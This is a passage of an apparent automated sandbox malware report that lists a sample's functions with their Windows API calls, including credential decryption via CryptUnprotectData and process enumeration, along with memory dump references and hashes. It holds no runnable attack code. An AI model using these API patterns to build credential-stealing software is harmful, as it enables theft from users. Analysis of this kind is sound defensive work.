                                        • Instruction Fuzzy Hash: 95416912E19FC9C5CB058B7544A02AEBFB22FE6210F6D82AEC4DD1F382C774414AD3A5
                                        Function 0018C920 Relevance: 7.6, APIs: 5, Instructions: 95stringencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0018C971
                                        • CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0018C97C
                                        • lstrcat.KERNEL32(?,001A0B47), ref: 0018CA43
                                        • lstrcat.KERNEL32(?,001A0B4B), ref: 0018CA57
                                        • lstrcat.KERNEL32(?,001A0B4E), ref: 0018CA78
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrcat$BinaryCryptStringlstrlen
                                        • String ID:
                                        • API String ID: 189259977-0
                                        • Opcode ID: 6e839d182d3de373a83edee876e00fc8481b3a8ea8fa592b4b5fa0214357b907
                                        • Instruction ID: c786ee02c5c9b68f58d3f525c49feee0c90e56ac8fa8356e93b5268f58094e14
                                        • Opcode Fuzzy Hash: 6e839d182d3de373a83edee876e00fc8481b3a8ea8fa592b4b5fa0214357b907
                                        • Instruction Fuzzy Hash: 68416E7890421E9BDB14DFA0DD88BFEB7B8AB48704F0041B8F509A7281D7709B84CFA5
                                        Function 001872A0 Relevance: 7.5, APIs: 5, Instructions: 48memoryencryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,00000400), ref: 001872AD
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 001872B4
                                        • CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000001,?), ref: 001872E1
                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,00000400,00000000,00000000), ref: 00187304
                                        • LocalFree.KERNEL32(?), ref: 0018730E
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateByteCharCryptDataFreeLocalMultiProcessUnprotectWide
                                        • String ID:
                                        • API String ID: 2609814428-0
                                        • Opcode ID: b021369bd0b2afb7d546888c329a4bea907d42791cce02bf47fbc125466d7f55
                                        • Instruction ID: a23952a9a0e5e5f4c1e98ebf2d87f64cbc978cffdd82f2b3ee5c239a716ecb96
                                        • Opcode Fuzzy Hash: b021369bd0b2afb7d546888c329a4bea907d42791cce02bf47fbc125466d7f55
                                        • Instruction Fuzzy Hash: 93014C75A44308BBDB10DFE4DC46FAE7778AB44B01F204064FB05AA2C1CBB0AA008B69
                                        Function 00199790 Relevance: 7.5, APIs: 5, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 001997AE
                                        • Process32First.KERNEL32(001A0ACE,00000128), ref: 001997C2
                                        • Process32Next.KERNEL32(001A0ACE,00000128), ref: 001997D7
                                        • StrCmpCA.SHLWAPI(?,00000000), ref: 001997EC
                                        • CloseHandle.KERNEL32(001A0ACE), ref: 0019980A
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                        • String ID:
                                        • API String ID: 420147892-0
                                        • Opcode ID: 6c18255a5069a6ec436c6d78324798e536cc2c78f5248f46b07b22dcb1faffc4
                                        • Instruction ID: fece44befc4073e649bc2dbe43f4ecfe765fa8ec06162779e9be443504fa558b
                                        • Opcode Fuzzy Hash: 6c18255a5069a6ec436c6d78324798e536cc2c78f5248f46b07b22dcb1faffc4
                                        • Instruction Fuzzy Hash: 9E01E975A14308ABDF24DFA4DD44BEDB7B8BB08701F1045ACE50996240EB70DA40CF50
                                        Function 001A4573 Relevance: 7.3, Strings: 2, Instructions: 4819COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: <7\h$huzx
                                        • API String ID: 0-2989614873
                                        • Opcode ID: e8dc66ebecccd7eafc5bf8ba452fd0316f4965e0d5a7ea873665f10710d640eb
                                        • Instruction ID: 14fdfd77b26c49b9bb83cc6f608b5f83d13b30865deffe0f264812898054a204
                                        • Opcode Fuzzy Hash: e8dc66ebecccd7eafc5bf8ba452fd0316f4965e0d5a7ea873665f10710d640eb
                                        • Instruction Fuzzy Hash: D063327A41EBD41ECB27CB3047B62A17F66BA1361031D49CEC8C18F5B3C7949A1AE356
                                        Function 005CF505 Relevance: 6.6, Strings: 4, Instructions: 1593COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ^5;_$a"~g$bs$gw
                                        • API String ID: 0-3156686373
                                        • Opcode ID: ef4648dbf5707407cd21e1ce4bde377d99fc00e31f9355233cb08d5b3d287adc
                                        • Instruction ID: 8806c917dedba20908906467c6dcefab69d8936e56f3120d168673ad514e7572
                                        • Opcode Fuzzy Hash: ef4648dbf5707407cd21e1ce4bde377d99fc00e31f9355233cb08d5b3d287adc
                                        • Instruction Fuzzy Hash: ABB206F3A0C2049FE7046E2DEC8567AFBE5EF94720F1A493DEAC483744EA3558058697
                                        Function 005CC033 Relevance: 6.6, Strings: 4, Instructions: 1589COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: ;k\$c_$c{63$q`_
                                        • API String ID: 0-679688097
                                        • Opcode ID: dee4a9b342781002ac60da8f6f0a11a47894909b161fa2ce4c29b9b6451bb774
                                        • Instruction ID: c6ba17ed3bf5bd8d9fdc30ad280ba4a6c6d2f39d9c68357d18c7d79cdf3df371
                                        • Opcode Fuzzy Hash: dee4a9b342781002ac60da8f6f0a11a47894909b161fa2ce4c29b9b6451bb774
                                        • Instruction Fuzzy Hash: 41A226F360C2049FE704AE2DEC8567AFBE9EB94720F1A4A3DE6C5C3740E63558058697
                                        Function 005D2A75 Relevance: 6.5, Strings: 4, Instructions: 1536COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID:
                                        • String ID: 9`]R$U%<;$cy$tmt
                                        • API String ID: 0-363399913
                                        • Opcode ID: 4f5d8f190c00fc34d2d1a33217d560f5709ff6340915a3a6b57a35b6fb834b15
                                        • Instruction ID: aa85730f46cb742e934df185cd304de7ce25dfd77016cd805e75245f631cf5e7
                                        • Opcode Fuzzy Hash: 4f5d8f190c00fc34d2d1a33217d560f5709ff6340915a3a6b57a35b6fb834b15
                                        • Instruction Fuzzy Hash: 3AA204F3A0C204AFE3046E2DEC8566AFBE9EF94720F16493DEAC4C3744E63559058697
                                        Function 00199030 Relevance: 6.1, APIs: 4, Instructions: 58encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptBinaryToStringA.CRYPT32(00000000,001851D4,40000001,00000000,00000000,?,001851D4), ref: 00199050
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptString
                                        • String ID:
                                        • API String ID: 80407269-0
                                        • Opcode ID: daf8d3c2825b8104fd960fc94a56d55e82ff91d1ce1a4c96cda62701df22fd97
                                        • Instruction ID: acb41fe344def80111b156e9b8d5b78d6f094fbc442c0730ca360cfe057a8d25
                                        • Opcode Fuzzy Hash: daf8d3c2825b8104fd960fc94a56d55e82ff91d1ce1a4c96cda62701df22fd97
                                        • Instruction Fuzzy Hash: BB110674204208FFDF04CF58D885FAB37ADAF89711F148468FA298B251D772E941DBA5
                                        Function 0018A210 Relevance: 6.1, APIs: 4, Instructions: 55encryptionmemoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A23F
                                        • LocalAlloc.KERNEL32(00000040,?,?,?,00184F3E,00000000,?), ref: 0018A251
                                        • CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00184F3E,00000000,00000000), ref: 0018A27A
                                        • LocalFree.KERNEL32(?,?,?,?,00184F3E,00000000,?), ref: 0018A28F
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: BinaryCryptLocalString$AllocFree
                                        • String ID:
                                        • API String ID: 4291131564-0
                                        • Opcode ID: 5825d8e42267a9252203bb3b7c7a7fee9e490c97d30d4c465348564ba01dc696
                                        • Instruction ID: 0210278b8133373082e42b384be83e490cf543c4dbc1d28532864eb30b7d5d65
                                        • Opcode Fuzzy Hash: 5825d8e42267a9252203bb3b7c7a7fee9e490c97d30d4c465348564ba01dc696
                                        • Instruction Fuzzy Hash: EE11A474240308AFEB11CF64DC95FAA77B6EB89B11F208499FD199B390C772EA41CB54
                                        Function 00197B10 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,001A0DE8,00000000,?), ref: 00197B40
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197B47
                                        • GetLocalTime.KERNEL32(?,?,?,?,?,001A0DE8,00000000,?), ref: 00197B54
                                        • wsprintfA.USER32 ref: 00197B83
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000005EB000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006F3000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.00000000006FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727131643.000000000070B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727376271.000000000070C000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727496061.00000000008A9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1727509709.00000000008AA000.00000080.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_180000_file.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Heap$AllocateLocalProcessTimewsprintf
                                        • String ID:
                                        • API String ID: 377395780-0
                                        • Opcode ID: 522ff954d5f6827ee8e578b95dec4ec5512676a1f4acf0540449b9c7a06b470d
                                        • Instruction ID: d182ac8562454f0d3eb54959ac8a4e3cf18d1a55bf0a77fed06ec69f43c9a092
                                        • Opcode Fuzzy Hash: 522ff954d5f6827ee8e578b95dec4ec5512676a1f4acf0540449b9c7a06b470d
                                        • Instruction Fuzzy Hash: 4911FEB2908219ABCB14DBD9ED45BBEB7F8EB4CB12F10416AF605A2280D7799940C774
                                        Function 00197BC0 Relevance: 6.0, APIs: 4, Instructions: 49memorytimeCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,00000000,00000000,?,011CE008,00000000,?,001A0DF8,00000000,?,00000000,00000000), ref: 00197BF3
                                        • RtlAllocateHeap.NTDLL(00000000), ref: 00197BFA
                                        • GetTimeZoneInformation.KERNEL32(?,?,?,?,00000000,00000000,?,011CE008,00000000,?,001A0DF8,00000000,?,00000000,00000000,?), ref: 00197C0D
                                        • wsprintfA.USER32 ref: 00197C47
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1726930523.0000000000181000.00000040.00000001.01000000.00000003.sdmp, Offset: 00180000, based on PE: true
                                        • Associated: 00000000.00000002.1726914247.0000000000180000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000001AC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002C9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.00000000002EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1726930523.0000000000456000.00000040.00000001.01000000.00000003.sdmpDownload File
